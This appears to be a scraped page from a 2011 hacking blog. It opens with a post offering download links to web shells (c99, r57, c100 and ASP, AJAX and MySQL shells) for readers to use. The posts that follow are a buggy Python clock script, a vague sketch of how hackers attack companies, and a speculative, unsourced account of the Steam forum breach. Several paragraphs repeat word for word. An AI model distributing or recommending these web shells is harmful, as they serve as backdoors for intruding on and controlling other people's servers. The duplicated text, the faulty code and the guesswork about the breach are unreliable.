Lately ive seen alot of people that had a hard time finding c99 shells, r57 shells, etc so I thought I would release a bunch so you guys dont have to look any further then Hackoria :D
c99: http://r57.gen.tr/c99.rar
r57: http://r57.gen.tr/r57.rar
c100: http://r57.gen.tr/c100.rar
ASP Shell: http://r57.gen.tr/cmd.rar
AJAX shell: http://r57.gen.tr/ajax.rar
MySQL Shell: http://r57.gen.tr/mysql.rar
Sunday, November 27, 2011
Simple Python Clock
Well I was bored and was playing around with some python and decided to make a simple clock. Here is the code:
import time as t
from Tkinter import *
hour = input("What is the current hour? ")
min = input("And how many minutes into the hour are me? ")
while 1:
if min < 10:
print "%s:0%s" % (hour,min)
else:
print "%s:%s" % (hour,min)
t.sleep(60)
min = min + 1
if min == 60:
min == 0
hour = hour + 1
if hour == 13:
hour = 1
Sunday, November 13, 2011
Hacking Large Companies
We see all these stories on the news of hacker teams going around hacking, and sometimes ruining these large companies. So then we have to ask ourselves, how do people go about hacking suck "secure" systems?
Well, first we have to understand things like this dont happen over night. It takes planning, sometimes months in planning.
First what they do is find out what the server is running. This can usually be done with a simple Nmap scan.
Next, the hackers create their own environment that is an exact replicate of the server they are planning to attack.
They then search for exploits, which takes quite some work. Now I'm not talking about public exploits that you find on the exploit-db im talking private exploits that are created by the hackers
Once this is complete they initiated the attack and all hell breaks loose.
This post was really because I've been getting a lot of questions lately about how this happens so I just thought I would post the process. This is also the VERY Basics of what happens behind the scense just so you get a general idea.
Well, first we have to understand things like this dont happen over night. It takes planning, sometimes months in planning.
First what they do is find out what the server is running. This can usually be done with a simple Nmap scan.
Next, the hackers create their own environment that is an exact replicate of the server they are planning to attack.
They then search for exploits, which takes quite some work. Now I'm not talking about public exploits that you find on the exploit-db im talking private exploits that are created by the hackers
Once this is complete they initiated the attack and all hell breaks loose.
This post was really because I've been getting a lot of questions lately about how this happens so I just thought I would post the process. This is also the VERY Basics of what happens behind the scense just so you get a general idea.
Steam was hacked... but how did it happen?
As you all probably know Steam was hacked, well the forums were, which allowed the hackers to access the Steam database and retrieve all types of sensitive information
So how did they do it? Lets break it down.
Steam runs an old version of vBulletin 3.8.7 I believe it is? Anyway, vBulletin has always been prone to vulnerabilities such as RFI and SQLi so Steam made a poor decision by choosing to use this forum software. Hackers then took advantage of this vulnerability and got all the information they needed.
This could have easily been avoided for two reasons, one, if they hadn't used the same MySQL server as they do for the actual Steam accounts the hackers could not have had access to the information, and two, Steam should not have been using vBulletin when better forum software like MyBB are out there.
If you have made any purchases on Steam I suggest you check your credit card more often to make sure there aren't any weird purchases on there.
So how did they do it? Lets break it down.
Steam runs an old version of vBulletin 3.8.7 I believe it is? Anyway, vBulletin has always been prone to vulnerabilities such as RFI and SQLi so Steam made a poor decision by choosing to use this forum software. Hackers then took advantage of this vulnerability and got all the information they needed.
This could have easily been avoided for two reasons, one, if they hadn't used the same MySQL server as they do for the actual Steam accounts the hackers could not have had access to the information, and two, Steam should not have been using vBulletin when better forum software like MyBB are out there.
If you have made any purchases on Steam I suggest you check your credit card more often to make sure there aren't any weird purchases on there.
Thursday, November 3, 2011
Nice python scripts
Hey, sorry I havent posted in like a month ahaha I havent had time.
Lately ive gotten back into python and ive been doing some work on a few scripts that may become useful to you.
I will try to release a new one as frequently as possible be sure to look out for those!
Lately ive gotten back into python and ive been doing some work on a few scripts that may become useful to you.
I will try to release a new one as frequently as possible be sure to look out for those!
Subscribe to:
Posts (Atom)